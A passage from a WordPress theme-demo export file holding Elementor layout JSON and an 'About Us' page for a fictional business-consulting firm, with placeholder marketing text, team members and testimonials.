shape.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"9c81ff3","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":30,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"55e9a19","elType":"widget","settings":{"title":"Listings","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"297dfb9","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"8d62022","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"b9ca8ad","elType":"widget","settings":{"editor":"<ol><li>Customer Experience<\/li><li>New Business Innovation<\/li><li>Sales and Marketing<\/li><\/ol>","text_color":"#5F5F5F","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_weight":"400","typography_line_height":{"unit":"px","size":42,"sizes":[]},"__globals__":{"text_color":""}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"7b081bc","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"0cf1b0f","elType":"widget","settings":{"editor":"<ul><li>Customer Experience<\/li><li>New Business Innovation<\/li><li>Sales and Marketing<\/li><\/ul>","text_color":"#5F5F5F","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_weight":"400","typography_line_height":{"unit":"px","size":42,"sizes":[]},"__globals__":{"text_color":""}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"6f037fd","elType":"column","settings":{"_column_size":25,"_inline_size":null,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"f728999","elType":"widget","settings":{"icon_list":[{"text":"Customer Experience","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/down-arrow.svg","id":480},"library":"svg"},"_id":"6733193"},{"text":"New Business Innovation","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/down-arrow.svg","id":480},"library":"svg"},"_id":"7a2cb9d"},{"text":"Sales and Marketing","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/down-arrow.svg","id":480},"library":"svg"},"_id":"51805a9"}],"space_between":{"unit":"px","size":12,"sizes":[]},"icon_color":"#52C5B6","icon_size":{"unit":"px","size":11,"sizes":[]},"text_indent":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"icon-list"}],"isInner":true},{"id":"6484bff","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"fff55a7","elType":"widget","settings":{"icon_list":[{"text":"Customer Experience","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/add.svg","id":481},"library":"svg"},"_id":"6733193"},{"text":"New Business Innovation","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/add.svg","id":481},"library":"svg"},"_id":"7a2cb9d"},{"text":"Sales and Marketing","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/add.svg","id":481},"library":"svg"},"_id":"51805a9"}],"space_between":{"unit":"px","size":12,"sizes":[]},"icon_color":"#52C5B6","icon_size":{"unit":"px","size":11,"sizes":[]},"text_indent":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"icon-list"}],"isInner":true}],"isInner":true},{"id":"99d54a9","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":30,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"c5b4eb2","elType":"widget","settings":{"title":"Blockquote","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0310507","elType":"section","settings":{"gap":"extended","structure":"30","layout":"full_width"},"elements":[{"id":"40df4db","elType":"column","settings":{"_column_size":33,"_inline_size":20},"elements":[],"isInner":true},{"id":"8a5f517","elType":"column","settings":{"_column_size":33,"_inline_size":59.33200000000000073896444519050419330596923828125},"elements":[{"id":"c1a7fe1","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"768ca46","elType":"column","settings":{"_column_size":33,"_inline_size":20},"elements":[],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:6:{s:7:"heading";a:3:{s:5:"count";i:14;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:14;s:11:"header_size";i:13;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:14;}}}}s:11:"text-editor";a:3:{s:5:"count";i:23;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:23;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:9;s:15:"_padding_mobile";i:3;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:2;s:21:"typography_typography";i:2;s:22:"typography_font_family";i:2;s:22:"typography_font_weight";i:2;s:22:"typography_line_height";i:2;}}}}s:7:"divider";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:2:{s:5:"color";i:6;s:3:"gap";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:6;s:15:"_padding_mobile";i:6;}}}}s:6:"column";a:3:{s:5:"count";i:19;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:1:{s:12:"_inline_size";i:19;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_mobile";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:7;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:2:{s:14:"section_layout";a:2:{s:3:"gap";i:6;s:6:"layout";i:6;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:6;s:14:"padding_mobile";i:2;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:2;s:9:"icon_size";i:2;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:2;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>About Us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/about-us/</link>
		<pubDate>Mon, 07 Sep 2020 09:01:54 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=487</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="630" height="475" src="https://maxbizz.s3.amazonaws.com/images/image1-about-us.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image1-about-us.jpg 630w, https://maxbizz.s3.amazonaws.com/images/image1-about-us-1-300x226.jpg 300w" sizes="(max-width: 630px) 100vw, 630px" />											
	        about company	        <h3>Make Digital Marketing  Work For Your Business</h3>	    
		<p>Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent into the firm, acquiring new companies, and developing new capabilities, for example, in design.</p><hr /><p>We serve clients at every level of their organization, whether as a trusted advisor to top management or as a hands-on coach.</p>		
										<img width="203" height="52" src="https://maxbizz.s3.amazonaws.com/images/signature-home5.png" alt="" loading="lazy" />											
			<h6>Peter Adams</h6>		
		<p>co-founder of company</p>		
        	<h6>Trusted <br>Clients</h6>      				        
        	<h6>Finished <br>Projects</h6>      				        
        	<h6>Years of <br>Experience</h6>      				        
        	<h6>Visited<br>Conferences</h6>      				        
	        what we do	        <h3>Creating Your Startup Business</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
					<a href="#"><img src="https://maxbizz.s3.amazonaws.com/images/features1-about-us.jpg" alt="Accounting &amp; Finance"></a>					
						<h5><a href="#">Accounting & Finance</a></h5>						<p>A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.</p>					
					<a href="#">Explore More</a>				
					<a href="#"><img src="https://maxbizz.s3.amazonaws.com/images/features2-about-us.jpg" alt="Management Skills"></a>					
						<h5><a href="#">Management Skills</a></h5>						<p>A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.</p>					
					<a href="#">Explore More</a>				
					<a href="#"><img src="https://maxbizz.s3.amazonaws.com/images/features3-about-us.jpg" alt="Business Planning"></a>					
						<h5><a href="#">Business Planning</a></h5>						<p>A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.</p>					
					<a href="#">Explore More</a>				
										<img width="516" height="625" src="https://maxbizz.s3.amazonaws.com/images/image2-about-us.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image2-about-us.png 516w, https://maxbizz.s3.amazonaws.com/images/image2-about-us-1-248x300.png 248w" sizes="(max-width: 516px) 100vw, 516px" />											
	        main principles	        <h3>Global Reach with Local  Understanding</h3>	    
		<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.</p>		
	        <h6>marketing analysis</h6>			
	        <h6>finance strategy</h6>			
	        <h6>business innovation</h6>			
		        <a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/01-2.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/02-2.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/03-2.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/04-2.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/05-2.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/06-2.svg" alt=""></figure></a>		    
	        testimonials	        <h3>What People Say About Us</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
							<h6>Oliver Simson</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
							<h6>Mary Grey</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
							<h6>Samanta Fox</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
							<h6>Oliver Simson</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
							<h6>Mary Grey</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
							<h6>Samanta Fox</h6>							client of company						
	        our team	        <h3>Our Skilled Leaders</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team1-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Monica Black</h6>				chief communication officer			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team2.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team2-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Peter Perish</h6>				chief business project			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team3.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team3-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Olivia Woodson</h6>				international consultant			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team4.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team4-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Peter Adams</h6>				co-founder of company			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-team">Explore More </a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>487</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 09:01:54]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 09:01:54]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[about-us]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[489]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"aeaf1cb","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","padding":{"unit":"px","top":"120","right":"0","bottom":"115","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"e209ac4","elType":"column","settings":{"_column_size":50,"_inline_size":50,"_inline_size_tablet":100},"elements":[{"id":"34ca8c4","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image1-about-us.jpg","id":491},"image_size":"full","align":"left","width_tablet":{"unit":"%","size":100,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"-60","bottom":"0","left":"0","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_box_shadow_box_shadow_type":"yes","_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"1feb286","elType":"column","settings":{"_column_size":50,"_inline_size":50,"_inline_size_tablet":100,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"100","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"841e06b","elType":"widget","settings":{"sub":"about company","title":"Make Digital Marketing  Work For Your Business","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"600","stitle_color":"#52C5B6"},"elements":[],"widgetType":"iheading"},{"id":"bb4f4ed","elType":"widget","settings":{"editor":"<p>Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent into the firm, acquiring new companies, and developing new capabilities, for example, in design.<\/p><hr \/><p>We serve clients at every level of their organization, whether as a trusted advisor to top management or as a hands-on coach.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"983ee34","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"3d77923","elType":"column","settings":{"_column_size":50,"_inline_size":null,"border_border":"solid","border_width":{"unit":"px","top":"0","right":"1","bottom":"0","left":"0","isLinked":false},"border_width_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":true},"border_color":"#00000026"},"elements":[{"id":"0f29b46","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/signature-home5.png","id":2316},"image_size":"full","align":"left","align_tablet":"right","align_mobile":"left","_padding_tablet":{"unit":"px","top":"0","right":"35","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"02cefd4","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"30","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"d2c189c","elType":"widget","settings":{"title":"Peter Adams","header_size":"h6","typography_font_family":"Roboto","typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"4146a85","elType":"widget","settings":{"editor":"<p>co-founder of company<\/p>","text_color":"#878787","typography_typography":"custom","typography_font_family":"Raleway","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"500","typography_text_transform":"uppercase"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"6af12be","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"112","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"9865002","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"0c75221","elType":"widget","settings":{"title":"Trusted <br>Clients","number":"350","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]},"number_typography_font_family":"Inter","number_typography_font_size":{"unit":"px","size":48,"sizes":[]},"number_typography_font_weight":"bold","title_typography_font_family":"Open Sans","title_typography_font_weight":"600","title_typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"icounter"}],"isInner":false},{"id":"4efe597","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"3976936","elType":"widget","settings":{"title":"Finished <br>Projects","number":"215","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]},"number_typography_font_family":"Open Sans","number_typography_font_size":{"unit":"px","size":48,"sizes":[]},"title_typography_font_family":"Open Sans","title_typography_font_weight":"600","number_typography_font_weight":"bold","title_typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"icounter"}],"isInner":false},{"id":"7d86b75","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"75279d9","elType":"widget","settings":{"title":"Years of <br>Experience","number":"15","number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]},"number_typography_font_family":"Open Sans","number_typography_font_size":{"unit":"px","size":48,"sizes":[]},"title_typography_font_family":"Open Sans","title_typography_font_weight":"600","number_typography_font_weight":"bold","title_typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"icounter"}],"isInner":false},{"id":"7c9f8c9","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"5e295b7","elType":"widget","settings":{"title":"Visited<br>Conferences","number":"36","number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]},"number_typography_font_family":"Open Sans","number_typography_font_size":{"unit":"px","size":48,"sizes":[]},"title_typography_font_family":"Open Sans","title_typography_font_weight":"600","number_typography_font_weight":"bold","title_typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"icounter"}],"isInner":false}],"isInner":false},{"id":"07bb3a8","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-about-us.jpg","id":504},"background_position":"top center","background_repeat":"no-repeat","padding":{"unit":"px","top":"117","right":"0","bottom":"66","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"9fed965","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"d2ab48f","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"44","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"ad3790a","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"ca838f8","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"ba65ecc","elType":"widget","settings":{"sub":"what we do","title":"Creating Your Startup Business","header_size":"h3","align":"center","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"23","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"600","stitle_color":"#FFFFFF"},"elements":[],"widgetType":"iheading"},{"id":"260733b","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center","text_color":"#FFFFFF"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"bdb7238","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"658246c","elType":"widget","settings":{"image_boxes":[{"_id":"e6758bb","image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/features1-about-us.jpg","id":501},"title_box":"Accounting & Finance","content_box":"A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.","link_box":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/features2-about-us.jpg","id":502},"title_box":"Management Skills","content_box":"A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.","link_box":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"112b6ab"},{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/features3-about-us.jpg","id":503},"title_box":"Business Planning","content_box":"A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.","link_box":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"8732ef5"}],"label_link":"Explore More","box_bg":"#FFFFFF","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[],"widgetType":"iiboxcarousel"}],"isInner":false}],"isInner":false},{"id":"edf75b3","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"dda17b7","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"1b3917e","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image2-about-us.png","id":508},"image_size":"full"},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"3490ca0","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"8df0dd7","elType":"widget","settings":{"sub":"main principles","title":"Global Reach with Local  Understanding","header_size":"h3","_margin":{"unit":"px","top":"-70","right":"0","bottom":"0","left":"0","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#52C5B6","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"9bcd87a","elType":"widget","settings":{"editor":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with 